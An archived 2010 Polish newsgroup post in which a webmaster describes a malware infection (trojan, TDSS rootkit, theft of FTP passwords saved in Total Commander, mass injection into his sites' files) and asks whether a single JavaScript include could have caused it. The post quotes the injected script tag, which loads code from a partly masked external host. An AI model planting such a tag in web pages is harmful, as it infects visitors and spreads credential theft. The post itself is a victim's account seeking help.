-
Path: news-archive.icm.edu.pl!news.gazeta.pl!not-for-mail
From: "latet" <l...@l...pl>
Newsgroups: pl.comp.www
Subject: [OT] Jak strasznie groźny może być kawałek kodu Java Script
Date: Wed, 16 Jun 2010 15:27:12 +0200
Organization: "Portal Gazeta.pl -> http://www.gazeta.pl"
Lines: 99
Message-ID: <hvajfg$fit$1@inews.gazeta.pl>
NNTP-Posting-Host: ds242.internetdsl.tpnet.pl
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-2"; reply-type=original
Content-Transfer-Encoding: 8bit
X-Trace: inews.gazeta.pl 1276694832 15965 80.53.254.242 (16 Jun 2010 13:27:12 GMT)
X-Complaints-To: u...@a...pl
NNTP-Posting-Date: Wed, 16 Jun 2010 13:27:12 +0000 (UTC)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5931
X-Priority: 3
X-Newsreader: Microsoft Outlook Express 6.00.2900.5931
X-User: latet
X-MSMail-Priority: Normal
Xref: news-archive.icm.edu.pl pl.comp.www:396158
[ ukryj nagłówki ]Witam,
Czy jest możliwe, że po wejściu na stronę www, na której znajduje się złośliwy
kod JS typu:
<script type="text/javascript"
src="http://blog.XXXXXXomestore.com:8080/File.js"></
script>
doszło do tak poważnych szkód jak:
1. istalacja w systemie trojana
2. instalacja root-kita, który ukrywa trojana
3. kradzież haseł do licznych kont FTP z ustawień Total Commandera!
4. wklejenie złośliwego kodu JS do setek plików na wszystkich serwerach do
których udało się robotowi zalogować dzięki ukradzionym tak hasłom do FTP.
Masakra!
Bo wczoraj tak się właśnie u mnie stało - mimo, ze cały czas działał Kaspersky.
Nie wiem tylko czy rzeczywiscie było tak, jak myślę, czy może zagrożenie wdarło
się inaczej?
Z moje strony wyglądało to tak:
1. Otrzymałem mailem czystko tekstowy (ASCII) załącznik .html
2. Skopiowałem go na pulpit i przeksnowałem antywirem - czysty.
3. Otworzyłem go EditPlusem, w środku zobaczyłem tylko taki kod JS jak wyżej.
4. Dibaeł mnie skusić, aby to odpalić pod FireFox - odpaliłem.
5. Kaspersky (heuristic) podniósł alarm, że złośliwy kod i że ZOSTAŁ
ZABLOKOWANY.
6. Myślałem więc, że nic sie nie stało i chyba się myliłem. Ale wtedy jeszcze
nie zauważyłem nic.
7. Wyłączyłem kompa i poszedłem do pracy.
8. Wróćiłem, odpalam kompa i zaczęły się pojawiać dość subtelne objawy infekcji,
mianowicie:
a) podczas wyszukiwania czegokolwiek w Google Kaspersky alarmwował, że
blokuje jakieś adresy Phishingowe.
b) w "msconfig" / "autostart" pojawiła sie pozycja wwwamq32.exe, której nie
dawało się wyłączyć (tzn. dawało sie, ale włączała sie spowrotem".
9. Zapuściłem skan Kasperskim i wykrył w pamieci RAM obecnosc rootkita
Rootkit.Win32.TDSS.bgqo. Probował go usuwać - wymuszajac podczas tej procedury
restart systemu, ale bezskutecznie.
10. Dopiero Kaspersky odpalony spod innego systetmu znalazł i usunął szkodnika w
3 miejscach:
http://www.medfoto.pl/img/rootkit.png
Myślałem, że już po sprawie, ale to był dopiero początek...
Wszedłem na jedną ze stron, które prowadzę i Kapsersky podniósł alarm, ze
zablokował na niej złośliwy skrypt. Zalogowałem sie przez FTP i zobaczyłem, że
wszelkie pliki index.php, wszystkie pliki *.js i trochę innych, zostało
zmodyfikowanych - dopisany do nich został cytowany na początku kod JS.
Pół nocy siedziałem i wywalałem złośliwy kod.
Na szczęście w tych godzinach ruch na stronach znikomy, ale pewnie parę osób się
zaraziło, nie wiem tylko jak poważnie, czy w taki sam sposób jak mój komp
pierwotnie (przypomnę, że ja odpaliłem plik z kodem JS lokalnie, a nie z netu -
być moze to czyni różnicę?).
W międzyczasie Kaspersky przestał blokować strony na których złośliwy kod
jeszcze był. Wygląda na to, że mają one z góry ustaloną na krótki czas
żywotność.
Oczywiście zmieniłem jeszcze wszystkie hasła, w tym hasła do baz SQL, które
przecież po zalogowaniu się przez FTP robot mógł ukraść z plików config. forum
phpBB.
Dla mnie morał jest taki, że nie wolno trzymać haseł do kont FPT zapisanych w
kliencie FTP. Trzeba je mieć w głowie.
Swoją drogą - nie wiem jeszcze, czy wirus ten nie ukradł też jakichś innych
haseł, np. zapisanych w przeglądarkach www. Tych na szczęście miałem mało,
głównie do jakichś Forum, gdzie mam uprawnienia szargo użytkownika.
Ale powtórzę pytanie początkowe - czy to wszystko mogło sie zacząć od
"niewinnego" kodu JS? Czy JS ma taki potencjał, że moze zmusić przeglądarkę do
zainstalowania takiego syfu bez zgody użytkownika? Przecież rootkit, to niemal
jak driver systemowy. Zapewniam, że nie byłem pytany o żadne potwierdzenia.
Wszystko się zainstalowało po cichu (Win XP, kotno z uprawnieniami admina).
Jeśli to się zaczęło przez JS, to jestem przerażony...
Jeśli inaczej - to jestem załamany, że nie wiem jak.
Przypomnę - Kaspersky działał, a nawet ostrzegał i niby mówił, że coś tam
blokuje, ale jednak z zerowym efektem!
Dzięki,
latet
Następne wpisy z tego wątku
- 18.06.10 08:37 kamil d
Najnowsze wątki z tej grupy
- Jakie znacie działające serwery grup dyskusyjnych?
- is it live this group at news.icm.edu.pl
- php, linki z nazwami a $_GET, SEO
- www polityka pl captcha
- dyktatura brudnego palucha
- www.znanylekarz.pl
- Czy pytanie o sczytywanie stron programami/skryptami to tu?
- Grupy webdevowe
- Jak wydrukować stronę?
- IIS, kilka witryn
- linki <a href="/strona.php"> (ze slashami)
- co rozszerza stronę??
- responsywny akapit <p>
- Czy istnieje jakiś emulator przeglądarek pod Mac'a?
- taka sama konfiguracja dla localhost i produkcji
Najnowsze wątki
- 2024-11-29 Dławik CM
- 2024-11-29 [OT] Lewe oprogramowanie
- 2024-11-29 Błonie => Sales Specialist <=
- 2024-11-29 Warszawa => IT Expert (Network Systems area) <=
- 2024-11-29 Warszawa => Ekspert IT (obszar systemów sieciowych) <=
- 2024-11-29 Warszawa => Head of International Freight Forwarding Department <=
- 2024-11-29 Białystok => Inżynier Serwisu Sprzętu Medycznego <=
- 2024-11-29 Pómpy ciepła darmo rozdajoo
- 2024-11-29 Białystok => Application Security Engineer <=
- 2024-11-29 Białystok => Programista Full Stack (.Net Core) <=
- 2024-11-29 Gdańsk => Software .Net Developer <=
- 2024-11-29 Wrocław => Key Account Manager <=
- 2024-11-29 Gdańsk => Specjalista ds. Sprzedaży <=
- 2024-11-29 Chrzanów => Specjalista ds. public relations <=
- 2024-11-27 Re: UseGalileo -- PRODUKTY I APLIKACJE UŻYWAJĄ JUŻ DZIŚ SYSTEMU GALILEO